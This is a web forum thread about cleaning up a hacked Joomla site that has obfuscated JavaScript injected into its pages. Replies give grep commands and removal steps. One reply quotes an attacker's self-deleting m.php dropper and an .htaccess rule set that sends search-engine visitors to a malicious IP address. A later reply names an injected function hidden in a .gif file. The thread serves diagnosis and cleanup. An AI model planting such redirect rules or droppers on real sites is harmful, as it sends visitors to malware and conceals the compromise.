Hi folks,

Please excuse me if this message sounds curt in any way. I am getting horribly frustrated with PHP and Joomla - most probably due to my lack of knowledge in the subject matters. It's doing my head in!

It seems one of the site I created a few years ago has been compromised. There is now an obfuscated javascript snippet at the bottom of each page. I have no idea where this snippet is coming from but some AV software report it as Trojan. I'm guessing this links to some malware site somewhere.

The website in question - www.bernesemountaindog.co.nz - has just been upgraded with a full set of 1.0.15 files. I exported the DB through PhpMyAdmin and a scan through the generated SQL revealed no similar content in the DB. I had a look at the template's index.php and nothing there either. I don't know Joomla or PHP enough to look further unfortunately.

I am posting it in this forum for lack of a more appropriate sounding one. Please folks - I'm sure there're some PHP or Joomla gurus out there. Any assistance would be greatly appreciated!

Cheers,
Dany.

You have a problem, your website has been injected with yahoo counter script


look for the following line in your pages, which is begining of the script

script language=javascript><!-- Yahoo! Counter startsAlso I would recomend taking website down as it will infect your website wisitors.

there are a number of ways to fix it you can google "script language=javascript><!-- Yahoo! Counter starts"

What I would recomend is the following

1) Take the website down. (you can set it to offline in joomla)
2) copy all the files to your pc at home
3) run a search on all files for the script ( i think it mainly infects index.* and home.* and default.* files but i may be wrong on this one)
4) remove all the script injections from all the files(note wich files you have modified file names)
5)reupload the files back to the server
6)change the permission on files you modified above to 644

I hope this will help also if the files are executable like script files you may need to set them to 744

This is what's bugging me - I've searched with a couple of tools but nothing returned. I have taken the site down for now and yes, I already downloaded a copy of the site and its DB.

I'm about to do another search through the files. Just to confirm, this command, executed from the root of the site's folder:

grep -R "Yahoo! Counter" *

should look for what I want, right?

D.

Yep if you running linux grep -R "Yahoo! Counter" * should do the job or even
grep -R "Yahoo" ./*

well earlyer I had a look at the source of your main page just by going view soece from firefox and i could see the script at the bottom.


who is your webhost?

also the other option is to do a diff between your files and a clean joomla download


also have a look at your webhosting folder for the following files

m.php

rename("ht",".htaccess");
unlink("m.php");
echo "OK";

and ht

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]

I think they might also have something to do with it

if you find them just rename them and see if it will fix your problem

Thanks, I can't find the file m.php anywhere, and I'm not using .htaccess in my folders - everything is probably inherited from the parent directory. Are you suggesting I should create one with that content?

My webhost is kiwihosting.net

no no no no do not create one as this is an example of a hacked one coz one of my joomla websites has been injected with javascript and that was one of the things i found during my investigation

Hi

Can't be much help sorry, but if you have not already, then the Joomla security thread is a good read(for 1.0.15):

http://forum.joomla.org/viewforum.php?f=267

esp. the security checklist

...but in the spirit of TRYING to help, you might find some more info here(or try a search in the Joomla forums - there appears to be a bit there):

http://forum.joomla.org/viewtopic.php?p=1581519

Thanks for the headsup tho' I'm off to check my joomla sites.

Cheers

Here is the final solution which seems to fix this issue

1) Download your website to your computer
2) restore .htaccess file to the original one from the original install of if you not using it just delete it or delete everything from it.
3) Do a search througth your website files for the following code if(!function_exists(’tmp_lkojfghx’))…”).
The good program to do it is wingrep. This code can be in any file or can be as a separate file in in the website this post refering to to it was found in submenu-on1.gif file, this file was containg only one function.
4) remove that function from your code or remove the file if it is in a separate file.
5) reupload your new htaccess file and any other files you have modified.


that should fix it

good luck

Thanks Casper - that has fixed it for now. I'll be interested in hearing how the code in a gif-prefixed file gets executed though!

D.